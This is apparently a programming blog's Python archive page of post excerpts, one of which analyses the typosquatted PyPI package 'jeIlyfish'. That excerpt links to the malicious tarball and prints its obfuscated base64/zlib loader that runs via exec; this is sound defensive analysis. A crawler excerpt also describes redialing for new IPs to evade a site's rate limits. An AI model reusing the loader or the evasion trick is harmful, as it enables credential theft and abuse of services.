Category Archives: Python

Notes about How Closure in Python 3 Captures Variables

Just 2 notes about how closure in Python 3 captures variables.

Note 1.

The wrong way

def make_multipiler_the_wrong_way():
    multipilers = []
    # Tries to remember each i
    for i in range(5):
        # All remember same last i
        multipilers.append(lambda x: i * x) 
    return multipilers

if __name__ == "__main__":
    m = make_multipiler_the_wrong_way()
    for i in range(5):
        print(m[i](3))

The output is

12
12
12
12
12

So the right way should be

def make_multipiler_the_right_way():
    def make_lambda(i):
        # when the closure is made
        # i is captured/bound in the scope of `make_lambda(i)`
        # so it won't change anymore
        return lambda x: i * x

    multipilers = []
    for i in range(5):
        multipilers.append(make_lambda(i))
    return multipilers

if __name__ == "__main__":
    m = make_multipiler_the_right_way()
    for i in range(5):
        print(m[i](3))
Continue reading Notes about How Closure in Python 3 Captures Variables

有毒的 "jeIlyfish" —— Python 3 恶意库

前两天有人发现了在 PyPI (Python Package Index) 上存在一个恶意库 —— jeIlyfish。其通过将正常拼写的 jellyfish 的第一个小写 l 替换成大写的 I 来达成伪装的目的。如果你使用的字体难以区分小写 l 和大写的 I 的话,那么就有可能遇到这样的恶意库的风险。因此推荐在编码的时候使用等宽字体,如 Menlo, Monaco, Osaka-Mono 等。

这个恶意库被安装使用之后,会尝试偷取用户的 SSH 和 GPG Keys。那么简单分析一下它是怎么写的。

昨天在清华大学的 TUNA 镜像上还能下载到恶意的 jeIlyfish 库,现在同步之后估计可能没了。

https://pypi.tuna.tsinghua.edu.cn/packages/cb/6c/8b9d8a603431397d72118cea8e474ce009f7b7c9d86d653085376562f793/jeIlyfish-0.7.1.tar.gz#sha256=1a6b4c155e112ab09f02765b8b423eb21cb6ae5cb9a5f3841a6c85e2f4735f04

解压之后,其目录结构如下

➜  jeIlyfish-0.7.1 tree .
.
├── LICENSE
├── MANIFEST.in
├── PKG-INFO
├── README.rst
├── docs
│   ├── Makefile
│   ├── changelog.rst
│   ├── comparison.rst
│   ├── conf.py
│   ├── index.rst
│   ├── phonetic.rst
│   └── stemming.rst
├── jeIlyfish
│   ├── __init__.py
│   ├── _jellyfish.py
│   ├── porter.py
│   └── test.py
├── jeIlyfish.egg-info
│   ├── PKG-INFO
│   ├── SOURCES.txt
│   ├── dependency_links.txt
│   └── top_level.txt
├── setup.cfg
└── setup.py

于是重点关注 .py 结尾的文件,在其 jeIlyfish/_jellyfish.py 文件中,第 313 行到第 338 行,有这么一段代码

import zlib
import base64


ZAUTHSS = ''
ZAUTHSS += 'eJx1U12PojAUfedXkMwDmjgOIDIyyTyoIH4gMiooTmYnQFsQQWoLKv76rYnZbDaz'
ZAUTHSS += 'fWh7T849vec294lXexEeT0XT6ScXpawkk+C9Z+yHK5JSPL3kg5h74tUuLeKsK8aa'
ZAUTHSS += '6SziySDryHmPhgX1sCUZtigVxga92oNkNeqL8Ox5/ZMeRo4xNpduJB2NCcROwXS2'
ZAUTHSS += 'wTVf3q7EUYE+xeVomhwLYsLeQhzth4tQkXpGipPAtTVPW1a6fz7oa2m38NYzDQSH'
ZAUTHSS += 'hCl0ksxCEz8HcbAzkDYuo/N4t8hs5qF0KtzHZxXQxBnXkXhKa5Zg18nHh0tAZCj+'
ZAUTHSS += 'oA+L2xFvgXMJtN3lNoPLj5XMSHR4ywOwHeqnV8kfKf7a2QTEl3aDjbpBfSOEZChf'
ZAUTHSS += '9jOqBxgHNKADZcXtc1yQkiewRWvaKij3XVRl6xsS8s6ANi3BPX5cGcr9iL4XGB4b'
ZAUTHSS += 'BW0DeD5WWdYSLqHQbP2IciWp3zj+viNS5HxFsmwfyvyjEhbe0zgeXiOIy785bQJP'
ZAUTHSS += 'FaTlP1T+zoVR43anABgVOSaQ0kYYUKgq7VBS7yCADQLbtAobHM8T4fOX+KwFYQQg'
ZAUTHSS += '+hJagtB6iDWEpCzx28tLuC+zus3EXuSut7u6YX4gQpOVEIBGs/1QFKoSPfeYU5QF'
ZAUTHSS += 'MX1nD8xdaz2xJrbB8c1P5e1Z+WpXGEPSaLLFPTyx7tP/NPJP+9l/QteSTVWUpNQR'
ZAUTHSS += 'ZbDXT9vcSl43I5ksclc0fUaZ37bLZJjHY69GMR2fA5otolpF187RlZ1riTrG6zLp'
ZAUTHSS += 'odQsjopv9NLM7juh1L2k2drSImCpTMSXtfshL/2RdvByfTbFeHS0C29oyPiwVVNk'
ZAUTHSS += 'Vs4NmfXZnkMEa3ex7LqpC8b92Uj9kNLJfSYmctiTdWuioFJDDADoluJhjfykc2bz'
ZAUTHSS += 'VgHXcbaFvhFXET1JVMl3dmym3lzpmFv5N6+3QHk='


ZAUTHSS = base64.b64decode(ZAUTHSS)
ZAUTHSS = zlib.decompress(ZAUTHSS)
if ZAUTHSS:
    exec(ZAUTHSS)

显然是一段先被 zip 压缩,然后 based64 编码的数据。那么我们这里就把原作者在这段代码中最后的 exec 换成 print,看看原始数据是什么

ZAUTHSS = base64.b64decode(ZAUTHSS)
ZAUTHSS = zlib.decompress(ZAUTHSS)
if ZAUTHSS:
    print(str(ZAUTHSS, encoding='utf-8'))
Continue reading 有毒的 "jeIlyfish" —— Python 3 恶意库

Python 2.7 + Scripting Bridge 导出 iTunes Library 里音乐的 MetaInfo 与封面到 MongoDB

作为某个 Project 的一部分~(暂时不透露是什么,嘻嘻(⁎⁍̴̛ᴗ⁍̴̛⁎) ) 需要把 iTunes 里面的所有音乐的 MetaInfo 和封面导出到 MongoDB 中

MongoDB 上次已经已经在 Raspberry Pi 4 上编译部署好了~在 Raspberry Pi 4 上安装 64-bit MongoDB Server 服务

然后再配合很久以前玩过的 在 Python 里使用 Scripting Bridge 与 iTunes 交互,就可以达到目标了233333

当然需要注意的是,这里要使用的是 macOS 自带的 Python 2.7,因为 ScriptingBridge 只安装在了自带的 Python 2.7 里

真正代码的话,其实整体来说很简单,需要考虑的点是如何做到不重复写封面,因为——

  1. 目前 Scripting Bridge 与 iTunes 交互时,只能一首音乐一首音乐的依次遍历,不能直接按照专辑遍历
  2. 同一张专辑里,有的音乐可能包含多张封面
  3. 不同的专辑可能被我 assgin 过相同的封面

综合这几点考虑的话,那就只能每次拿到有封面的音乐之后,对它的每一张封面都计算 SHA256 摘要(这里暂且认为 SHA256 的空间足够大,不会产生碰撞),并在放进 global_sha256 前,检查是否已经有相同的 SHA256 存在其中。如果没有的话,才保存图片到磁盘中,并放到那首歌的 MetaInfo 中;如果在 global_sha256 中有的话,那么就再看那首歌的 MetaInfo 中有没有这个 SHA256(因为也许有人不小心添加了两张一样的封面到音乐里)。

在遍历完所有音乐之后,把这些 MetaInfo 写入到 JSON 文件中~(就像下面这样

{
  "album": "Cutie Panther", 
  "name": "夏、終わらないで。", 
  "artist": "BiBi (南條愛乃, Pile, 徳井青空)", 
  "cover": [
    "44f9b56091c7ca5b011cd9cb306eab21d4f854300c96347a0a7f3538cbeb9dcd-1"
  ], 
  "composer": "渡辺和紀", 
  "year": 0, 
  "sha256": [
    "44f9b56091c7ca5b011cd9cb306eab21d4f854300c96347a0a7f3538cbeb9dcd"
  ]
}

最后再导进 MongoDB 数据库就可以啦(当然需要安装一下 pymongo 库)~主要的就分为 2 个 stage ♪(´ε` )

python2.7 -m pip install --user pymongo
python2.7 iTunes.py -s 1
python2.7 iTunes.py --host raspberrypi.local -s 2
Continue reading Python 2.7 + Scripting Bridge 导出 iTunes Library 里音乐的 MetaInfo 与封面到 MongoDB

Using C/C++ for Python Extension

In general, C/C++ can be used to extend the functionality of Python with almost the highest performance you demand. To write a Python extension in C/C++ is relatively easy.

I'll show a simplified extension which is used in real life. This extension is made to extract records in a special file format, .pcap, and .pcap file is used to store the captured network packets so that the network activities can be analysed later.

Although there are many alternatives, they cannot achieve the goal in reasonable time. One of these alternatives is scapy, please don't get me wrong, scapy is a fabulous networking package. It can automatically parse all the records in .pcap file, which is an amazing feature. However, the parsing work will also take significant amount of time, especially for a large .pcap file with hundreds of thousands records inside.

At that time, my goal was quite straightforward. The time when captured the packet, from which source IP the packet was sent, and the destination IP of the packet. Given these demanding, there is no need to parse any record as deep as scapy would do. I can just check whether it contains IP layer or not, and if yes, extract the source IP and destination IP. Otherwise I'll skip to next record. And that's all.

I decided to name the extension as streampcap. And the class name would be StreamPcap so that I can write my Python code as below.

from streampcap import StreamPcap

pcap = StreamPcap("sample.pcap")
packet = pcap.next()
while packet is not None:
    print("{} {} {}".format(packet["time"], packet["ip_src"], packet["ip_dst"]))
    packet = pcap.next()

In order to implement this functionality, python-dev should be installed if the OS is Ubuntu/Debian/CentOS and etc Linux based operating systems. As for macOS, personally I use miniconda to manage the Python environment, and I think that miniconda will automatically get the same thing done. And miniconda is also available for Linux based OS. Life is easier!

Continue reading Using C/C++ for Python Extension

Magic Image(3)——Implementation in Python3 with Either OpenCV3 or PIL

It has been 3 years since the last update on Magic Image, https://blog.0xbbc.com/2016/09/magic-image2-mathematical-model/, which talked about the mathematical model of creating the mix image.

And to be honest, the Python implementation actually wrote 4 months ago, but it only support OpenCV then. And today, out of personal interest, I added PIL support. Now it could run with PIL only. (But if it detects the existence of OpenCV, that would be preferred)

Continue reading Magic Image(3)——Implementation in Python3 with Either OpenCV3 or PIL

Rewrite the styled code in HTML generated by Apple to WordPress compatible HTML

My first blog writing was in 2013, and at that time, WordPress was able to handle the styled code correctly, i.e., the code preserved the syntax highlight when I copy it from Xcode / CodeRunner and paste into the WordPress editor. The editor was capable of converting or persevering the colour info, and it did a great job of formatting the styled code into HTML.

Just like this post, https://blog.0xbbc.com/2013/08/assertmacros-problem/. The code shown below

typedef int (*PYStdWriter)(void *, const char *, int);
static PYStdWriter _oldStdWrite;

could be nicely formatted into the corresponding HTML code

<span style="color: #bb2ca2;">typedef</span> <span style="color: #bb2ca2;">int</span> (*PYStdWriter)(<span style="color: #bb2ca2;">void</span> *, <span style="color: #bb2ca2;">const</span> <span style="color: #bb2ca2;">char</span> *, <span style="color: #bb2ca2;">int</span>);
<span style="color: #bb2ca2;">static</span> <span style="color: #4f8187;">PYStdWriter</span> _oldStdWrite;

However, it was about the time WordPress upgraded to 3.9, the aforementioned functionality was removed. Although there are tens of syntax highlighting plugins, but I don't really like the colour schemes they offer. Besides, sometimes I may need to highlight a small portion of code. Such as this post, https://blog.0xbbc.com/2017/05/the-reason-that-codesign-remove-signature-generates-malformed-macho-still-remains-mystery/

/*
* If this has a code signature load command reuse it and just change
* the size of that data.  But do not use the old data.
*/
if(object->code_sig_cmd != NULL){
    if(object->seg_linkedit != NULL){
        object->seg_linkedit->filesize += arch_signs[i].datasize - object->code_sig_cmd->datasize; 
        if(object->seg_linkedit->filesize > object->seg_linkedit->vmsize)

As you can see, using native HTML code could enable extra control and functionality.

Continue reading Rewrite the styled code in HTML generated by Apple to WordPress compatible HTML

SIGGRAPH 2018 「Semantic Soft Segmentation」复现笔记

santa
santa

SIGGRAPH 2018这篇论文主要分为两大部分,第一部分是 DeepLab v2+ResNet101 训练出来用于获取输入图像的 high-level feature 网络,对于输入的 $I = (h, w, 3)$ 图像,为每一个像素点生成一个 128 维的特征向量,因此该网络的输出是 $F = (h, w, 128)$

接下来,使用 $F$ 和 $I$ 进行引导滤波,$F_{filtered} = imguidedfilter(F, I, 10, 0.01)$,在引导滤波这个地方,OpenCV中的 cv2.ximgproc.guided_filter 与原作者使用的 matlab 中实现的 imguidedfilter 有不小区别,于是我对着 matlab 中 imguidedfilter 的实现重写了一下 OpenCV 版的,bluecocoa/imguidedfilter-opencv

在计算完了 $F_{filtered}$ 之后,利用 PCA 将它压缩到 3 维,$F_{PCA} = PCA(F_{filtered}, 3)$,如下图。

santa PCA
santa PCA

Continue reading SIGGRAPH 2018 「Semantic Soft Segmentation」复现笔记

01背包~四次元背包里都会装上什么呢~\(≧▽≦)/

啊w 01背包呐~给出一堆不可拆分的东西,它们有各自的重量和对你来说相应的价值,但是你的背包能装的最大重量是有限的,这个时候要如何选择装哪些东西使得背包里的东西有着最大的总价值呢~

Continue reading 01背包~四次元背包里都会装上什么呢~\(≧▽≦)/

来下围棋吧~TensorFlow minigo~

TensorFlow 早些天发布了一个名为 minigo 的项目,因为 Google 官方还一直没有开源 AlphaZero,那么就先来看看 minigo 怎么玩(搞事情)吧www

假设乃使用的是 macOS / Ubuntu / debian,当然其他系统也可以,操作大同小异。

首先是安装 Python 3,macOS 下默认是 python2.7,新的 Python 3 需要去 Python 官网下载,https://www.python.org/downloads/。对于 Ubuntu / debian 来说的话,则是直接

apt-get install python3

当然,比较新的 Ubuntu / debian 都会默认安装 python3.6~

Continue reading 来下围棋吧~TensorFlow minigo~

探索网易云音乐——用 Python 写个爬虫吧w

既然想到要写点什么东西的话,那么就来试试网易云音乐吧w

那么第一步,我们要有数据才行,网易也当然不会公开自己的数据库啦,于是我们得用爬虫才行~

Python 语言里可以选择的爬虫还是不少,比如 Scrapy,然后在一开始开开心心的选择了 scrapy,之后发现网易云音乐对于 IP 的访问频率有限制,一旦超过限制,就会触发网易云的保护机制,暂时进入网易云黑名单,此时再访问的话,服务器返回的就都是 HTTP 503 - Service Unavailable。

解决方法说简单也简单,说麻烦也麻烦。简单在于,我的网络是电信的,于是只要重新拨号就能拿到新的公网 IP,写重新拨号的脚本也很简单。而稍有麻烦的地方在于,scrapy 是多线程的,在自己处理网易云返回 503 的时候,要注意重新拨号的脚本只需要执行一次。

如下图所示,假设我们的爬虫是 4 个线程,线程 2 在 t1 时刻访问时,遇到了 HTTP 503 之后,它就会进入我们处理网易云音乐 HTTP 503 的 handler。而对于其他线程来说,如果在 t1 时刻之前就开始访问了的话,那么是没有问题的,比如线程 1;如果是在 t1 时刻之后的话,比如线程 3、4,那么它们也会遇到 HTTP 503,但是这个时候,线程 3、4 就不用再走一次 handler,而是等待然后重试就可以。

HTTP 503 Handler
HTTP 503 Handler

但是也不用这么费劲,既然网易云音乐有频率限制,使用多线程的话,反而会更快的触发网易云的黑名单机制,因此,顺便作为重造轮子,我们来自己写个爬虫吧/

Continue reading 探索网易云音乐——用 Python 写个爬虫吧w